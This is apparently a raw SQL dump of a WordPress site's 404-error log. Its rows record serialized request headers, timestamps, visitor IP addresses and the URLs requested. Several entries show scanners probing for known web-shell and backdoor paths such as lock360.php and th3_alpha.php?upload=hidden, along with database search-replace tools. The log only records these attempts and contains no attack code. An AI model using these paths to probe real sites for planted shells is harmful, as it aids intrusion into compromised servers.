Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443641.68877506256103515625;s:12:\"REQUEST_TIME\";i:1631443641;}}','notice','2021-09-12 10:47:23','2021-09-12 10:47:21',72605744,72689608,'http://zphiblgz.org/searchdb.php',1,0,'162.247.74.216'),(97007,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4427.0 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443640.153192996978759765625;s:12:\"REQUEST_TIME\";i:1631443640;}}','notice','2021-09-12 10:47:21','2021-09-12 10:47:20',72311912,72395648,'http://zphiblgz.org/scholarship/application/',1,0,'92.38.136.69'),(97006,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443638.650763034820556640625;s:12:\"REQUEST_TIME\";i:1631443638;}}','notice','2021-09-12 10:47:20','2021-09-12 10:47:18',72629336,72713088,'http://zphiblgz.org/findreplacedb.php',1,0,'193.218.118.147'),(97005,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443630.4774520397186279296875;s:12:\"REQUEST_TIME\";i:1631443630;}}','notice','2021-09-12 10:47:12','2021-09-12 10:47:10',72605928,72689768,'http://zphiblgz.org/Search-DB-master-ohiu/',1,0,'176.10.107.180'),(97004,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443627.5027859210968017578125;s:12:\"REQUEST_TIME\";i:1631443627;}}','notice','2021-09-12 10:47:09','2021-09-12 10:47:07',72605824,72689680,'http://zphiblgz.org/Search-DB-master/',1,0,'176.10.107.180'),(97003,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:139:\"Mozilla/5.0 (Linux; Android 4.1.2; SGH-I727R Build/JZO54K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Mobile Safari/537.22\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631443624.37009906768798828125;s:12:\"REQUEST_TIME\";i:1631443624;}}','notice','2021-09-12 10:47:06','2021-09-12 10:47:04',72604728,72688464,'http://zphiblgz.org/SearchReplace-master/',1,0,'176.10.107.180'),(97002,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631438241.4016249179840087890625;s:12:\"REQUEST_TIME\";i:1631438241;}}','notice','2021-09-12 09:17:23','2021-09-12 09:17:21',72604936,72688672,'http://zphiblgz.org/scholarship/application/',1,0,'92.118.77.10'),(97001,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631436184.6374599933624267578125;s:12:\"REQUEST_TIME\";i:1631436184;}}','notice','2021-09-12 08:43:06','2021-09-12 08:43:04',72672744,72771304,'https://zphiblgz.org/cache/subfusiform/th3_alpha.php?upload=hidden',1,0,'185.191.34.215'),(97000,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631431882.322451114654541015625;s:12:\"REQUEST_TIME\";i:1631431882;}}','notice','2021-09-12 07:31:23','2021-09-12 07:31:22',72311848,72395616,'http://zphiblgz.org/application',1,0,'44.193.208.154'),(96999,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631429225.63294696807861328125;s:12:\"REQUEST_TIME\";i:1631429225;}}','notice','2021-09-12 06:47:07','2021-09-12 06:47:05',72672816,72771352,'https://zphiblgz.org/wp-includes/Text/Diff/Engine/cache.php?ms-load=fiona84',1,0,'185.191.34.215'),(96998,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631428155.527184009552001953125;s:12:\"REQUEST_TIME\";i:1631428155;}}','notice','2021-09-12 06:29:17','2021-09-12 06:29:15',72604904,72688640,'http://zphiblgz.org/scholarship/application/',1,0,'46.33.33.1'),(96996,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:102:\"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631426354.95234203338623046875;s:12:\"REQUEST_TIME\";i:1631426354;}}','notice','2021-09-12 05:59:17','2021-09-12 05:59:15',72709584,72793320,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(96997,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:11:\"HTTP_ACCEPT\";s:99:\"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\";s:19:\"HTTP_ACCEPT_CHARSET\";s:32:\"utf-8,windows-1251;q=0.7,*;q=0.7\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-us,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_KEEP_ALIVE\";s:3:\"300\";s:15:\"HTTP_USER_AGENT\";s:110:\"Mozilla/5.0 (X11; Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2911.12 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631427488.0241448879241943359375;s:12:\"REQUEST_TIME\";i:1631427488;}}','notice','2021-09-12 06:18:10','2021-09-12 06:18:08',72652464,72736120,'http://zphiblgz.org/lock360.php?daksldlkdsadas=1',1,0,'185.217.198.183'),(97069,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:25:\"AdsBot-Google-Mobile-Apps\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631682782.3412570953369140625;s:12:\"REQUEST_TIME\";i:1631682782;}}','notice','2021-09-15 05:13:04','2021-09-15 05:13:02',72336744,72420384,'http://zphiblgz.org/0993f819-b450-4df0-8cb5-81c310668029',1,0,'3.94.137.21'),(97068,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631679322.3120830059051513671875;s:12:\"REQUEST_TIME\";i:1631679322;}}','notice','2021-09-15 04:15:24','2021-09-15 04:15:22',72623664,72707400,'http://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(97067,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631676291.7466900348663330078125;s:12:\"REQUEST_TIME\";i:1631676291;}}','notice','2021-09-15 03:24:53','2021-09-15 03:24:52',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'154.13.1.159'),(97136,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821020.81606197357177734375;s:12:\"REQUEST_TIME\";i:1631821020;}}','notice','2021-09-16 19:37:02','2021-09-16 19:37:01',72629800,72713544,'http://zphiblgz.org/loan',1,0,'101.36.110.241'),(97135,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821000.8339750766754150390625;s:12:\"REQUEST_TIME\";i:1631821000;}}','notice','2021-09-16 19:36:42','2021-09-16 19:36:41',72605072,72688824,'http://zphiblgz.org/im/',1,0,'101.36.110.241'),(97134,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817533.9226939678192138671875;s:12:\"REQUEST_TIME\";i:1631817533;}}','notice','2021-09-16 18:38:55','2021-09-16 18:38:54',72606496,72690352,'http://zphiblgz.org/Public/initJs.php',1,0,'101.36.110.241'),(97133,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817534.433620929718017578125;s:12:\"REQUEST_TIME\";i:1631817534;}}','notice','2021-09-16 18:38:55','2021-09-16 18:38:54',72350144,72450344,'http://zphiblgz.org/Home/Get/getJnd28',1,0,'101.36.110.241'),(97132,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817534.2287750244140625;s:12:\"REQUEST_TIME\";i:1631817534;}}','notice','2021-09-16 18:38:55','2021-09-16 18:38:54',72350144,72450344,'http://zphiblgz.org/mytio/config/base',1,0,'101.36.110.241'),(97131,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817512.045237064361572265625;s:12:\"REQUEST_TIME\";i:1631817512;}}','notice','2021-09-16 18:38:32','2021-09-16 18:38:32',72350032,72450240,'http://zphiblgz.org/im/in/GetUuid',1,0,'101.36.110.241'),(97130,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817510.586186885833740234375;s:12:\"REQUEST_TIME\";i:1631817510;}}','notice','2021-09-16 18:38:31','2021-09-16 18:38:30',72350088,72450296,'http://zphiblgz.org/apis/api/index',1,0,'101.36.110.241'),(97129,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631817507.7620990276336669921875;s:12:\"REQUEST_TIME\";i:1631817507;}}','notice','2021-09-16 18:38:29','2021-09-16 18:38:27',72606440,72690304,'http://zphiblgz.org/api/contactWay',1,0,'101.36.110.241'),(97128,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, 